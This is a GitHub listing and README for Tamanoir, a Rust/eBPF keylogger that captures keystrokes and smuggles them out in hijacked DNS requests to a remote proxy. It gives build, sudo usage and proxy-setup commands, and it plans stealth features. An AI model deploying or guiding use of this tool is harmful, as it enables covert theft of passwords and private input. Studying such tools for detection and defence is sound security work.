https://github.com/pythops/tamanoir

A KeyLogger using eBPF 🐝
https://github.com/pythops/tamanoir

aya ebpf hacking keylogger linux rust security

Last synced: 16 days ago
JSON representation

A KeyLogger using eBPF 🐝

• Host: GitHub
• URL: https://github.com/pythops/tamanoir
• Owner: pythops
• License: gpl-3.0
• Created: 2024-10-19T20:34:40.000Z (2 months ago)
• Default Branch: main
• Last Pushed: 2024-12-03T09:24:50.000Z (20 days ago)
• Last Synced: 2024-12-03T10:29:30.144Z (20 days ago)
• Topics: aya, ebpf, hacking, keylogger, linux, rust, security
• Language: Rust
• Homepage:
• Size: 68.4 KB
• Stars: 52
• Watchers: 3
• Forks: 4
• Open Issues: 3
• Metadata Files:
  • Readme: README.md
  • Funding: .github/FUNDING.yml
  • License: LICENSE

Awesome Lists containing this project

README

        


  
 Tamanoir 
 A KeyLogger using eBPF 🐝 

  

  


    

      A large anteater of Central and South America, Myrmecophaga tridactyla

    

  



## 💡Overview



  



1. Capture keystrokes and store them in a queue in the kernel.

2. Intercept DNS requests and inject the captured keystroes in the DNS payload then redirect the request designated remote server acting as a DNS proxy.

3. On the remote server, extract the keys from the DNS payload and send a valid DNS response.

4. Intercept the response and modify its source address so the initial request will complete successfully.




## 🚀 Setup

You need a Linux based OS.

### ⚒️ Build from source

To build from source, make sure you have:

- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.

- [Rust](https://www.rust-lang.org/tools/install) installed with `nightly` toolchain.

#### 1. Build ebpf program

```

cd tamanoir-ebpf

cargo build --release

```

#### 2. Build user space program

```

cargo build --release

```

This will produce an executable file at `target/release/tamanoir` that you can copy to a directory in your `$PATH`

### 📥 Binary release

You can download the pre-built binaries from the [release page](https://github.com/pythops/tamanoir/releases)




## 🪄 Usage

### Tamanoir

```

RUST_LOG=info sudo -E tamanoir \

              --proxy-ip  \

              --hijack-ip  \

              --layout  \

              --iface 

```

for example:

```

RUST_LOG=info sudo -E tamanoir \

              --proxy-ip 192.168.1.75 \

              --hijack-ip 8.8.8.8 \

              --layout 0 \

              --iface wlan0

```

Currenly, there are two supported keyboard layouts:

`0` : qwerty (us)

`1` : azerty (fr)




### DNS Proxy

On a remote host, make sure you have [docker](https://docs.docker.com/engine/install/) installed.

#### 1. Build proxy image

```

cd proxy

docker build -t proxy .

```

#### 2. Run proxy

> [!NOTE]

> Make sure port 53 is available

```

docker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy

```




## 🛠️TODO

- [ ] Automatic discovery of the configured local dns server

- [ ] Automatic discovery of the keyboard layout

- [ ] Rewrite the DNS proxy in Rust

- [ ] Make `Tamanoir` stealth (hide used ebpf maps and programs, process pid ...)




## ⚠️ Disclaimer

`Tamanoir` is developed for educational purposes only




## ✍️ Authors

[Badr Badri](https://github.com/pythops)

[Adrien Gaultier](https://github.com/adgaultier)




## ⚖️ License

GPLv3